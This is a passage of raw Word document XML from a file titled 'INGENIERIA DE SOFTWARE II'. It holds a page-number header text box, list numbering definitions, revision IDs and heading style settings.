                            <w:jc w:val="right"/>
                          </w:pPr>
                          <w:r>
                            <w:t>INGENIERIA DE SOFTWARE II</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20" o:spid="_x0000_s1026"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5E1471" w:rsidRDefault="005E1471">
                    <w:pPr>
                      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      <w:jc w:val="right"/>
                    </w:pPr>
                    <w:r>
                      <w:t>INGENIERIA DE SOFTWARE II</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap anchorx="margin" anchory="margin"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="es-BO"/>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5E1471" w:rsidRDefault="005E1471">
                          <w:pPr>
                            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            <w:rPr>
                              <w:color w:val="FFFFFF" w:themeColor="background1"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
                          </w:r>
                          <w:r>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r w:rsidR="00813FB5" w:rsidRPr="00813FB5">
                            <w:rPr>
                              <w:noProof/>
                              <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              <w:lang w:val="es-ES"/>
                            </w:rPr>
                            <w:t>58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Cuadro de texto 221" o:spid="_x0000_s1027"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74b5e4 [1945]" stroked="f">
              <v:textbox style="mso-fit-shape-to-text:t" inset=",0,,0">
                <w:txbxContent>
                  <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471">
                    <w:pPr>
                      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      <w:rPr>
                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
                    </w:r>
                    <w:r>
                      <w:fldChar w:fldCharType="separate"/>
                    </w:r>
                    <w:r w:rsidR="00813FB5" w:rsidRPr="00813FB5">
                      <w:rPr>
                        <w:noProof/>
                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                      <w:t>58</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E82EB520"/>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822E82A0"/>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177B8A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41D4B04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01391DFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4209D8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017B6907"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAF0BD3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01E311DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="081EAAA0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cstheme="minorBidi"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="792" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cstheme="minorBidi"/>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6AA53E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1430BE38"/>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0A7C66EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F44CC5E6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="405" w:hanging="405"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1197" w:hanging="405"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="16B602C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B9C96E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19365A48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="081EAAA0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cstheme="minorBidi"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="792" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cstheme="minorBidi"/>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5D81B86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="116819B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88078F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CFB256CC"/>
    <w:lvl w:ilvl="0" w:tplc="5964BE2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="1A495D"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9112C14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E744B2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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2F162C5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A66D390"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cstheme="minorBidi"/>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283559"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4BE925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36D3763B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EED2830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37173403"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28D49218"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1365" w:hanging="405"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2040" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2760" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3120" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3840" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4200" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4920" w:hanging="1800"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5280" w:hanging="1800"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="385A0C7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBFAB29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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3A9D5F0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E98C608"/>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44734437"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77AEB6EA"/>
    <w:lvl w:ilvl="0" w:tplc="5964BE2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="1A495D"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78A40BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BED4818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547B2C31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4C6A05C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="765" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1170" w:hanging="405"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1845" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2565" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2925" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3645" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4005" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4725" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5085" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="58322E62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82A8E05A"/>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5C630DCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D65C297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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5C6561B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F390882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5EE65646"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C0A001F"/>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F231357"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82A8E05A"/>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617A512A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26B42C14"/>
    <w:lvl w:ilvl="0" w:tplc="5964BE2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="1A495D"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9041141"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7538794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6EF44F96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A838F7E4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Ttulo1"/>
      <w:lvlText w:val="Capítulo %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Ttulo2"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Ttulo3"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Ttulo4"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Ttulo5"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3774"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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6F085606"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F48C5FD6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="390" w:hanging="390"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="72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5040" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7AFC7ABB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="279CF8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AFF6D74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F0071E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7F6B00BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="371441D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29"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="21"/>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3"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="0"/>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19"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="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num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="3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716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0FD"/>
    <w:rsid w:val="0001009B"/>
    <w:rsid w:val="000D0C41"/>
    <w:rsid w:val="001B08E6"/>
    <w:rsid w:val="00245646"/>
    <w:rsid w:val="00277259"/>
    <w:rsid w:val="003311C6"/>
    <w:rsid w:val="003A5812"/>
    <w:rsid w:val="003B31D8"/>
    <w:rsid w:val="00437E6D"/>
    <w:rsid w:val="00457363"/>
    <w:rsid w:val="00491F38"/>
    <w:rsid w:val="004A2DAE"/>
    <w:rsid w:val="004A64C8"/>
    <w:rsid w:val="00515C5A"/>
    <w:rsid w:val="0059112D"/>
    <w:rsid w:val="00596899"/>
    <w:rsid w:val="005A7CE5"/>
    <w:rsid w:val="005E1471"/>
    <w:rsid w:val="006319CD"/>
    <w:rsid w:val="006D7232"/>
    <w:rsid w:val="0074429D"/>
    <w:rsid w:val="00746B31"/>
    <w:rsid w:val="00776327"/>
    <w:rsid w:val="007C1EFC"/>
    <w:rsid w:val="007E1287"/>
    <w:rsid w:val="007E28E7"/>
    <w:rsid w:val="007E33FE"/>
    <w:rsid w:val="00813FB5"/>
    <w:rsid w:val="008F0784"/>
    <w:rsid w:val="00954840"/>
    <w:rsid w:val="00966700"/>
    <w:rsid w:val="009D0BAC"/>
    <w:rsid w:val="00A64052"/>
    <w:rsid w:val="00AF05EF"/>
    <w:rsid w:val="00B27B46"/>
    <w:rsid w:val="00B54968"/>
    <w:rsid w:val="00BB4BD8"/>
    <w:rsid w:val="00BD6D33"/>
    <w:rsid w:val="00C87897"/>
    <w:rsid w:val="00CF0096"/>
    <w:rsid w:val="00D11E70"/>
    <w:rsid w:val="00D37A2B"/>
    <w:rsid w:val="00D8083F"/>
    <w:rsid w:val="00D87D93"/>
    <w:rsid w:val="00D960FD"/>
    <w:rsid w:val="00E27657"/>
    <w:rsid w:val="00ED68D7"/>
    <w:rsid w:val="00F55733"/>
    <w:rsid w:val="00F75236"/>
    <w:rsid w:val="00FC5AAE"/>
    <w:rsid w:val="00FE091E"/>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7731BDFD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{36050A1C-F869-43F2-8F1A-FDA7FDB4F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BO"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6B31"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>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7E33FE"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1287"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="58B6C0" w:themeColor="accent2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo3Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007E33FE"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="80" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1287"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="398E98" w:themeColor="accent2" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo4Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D11E70"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1644" w:hanging="1077"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>
      <w:szCs w:val="28"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo5Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>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tulo6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo6Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>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tulo7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo7Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="80" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo8Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="80" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo9Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
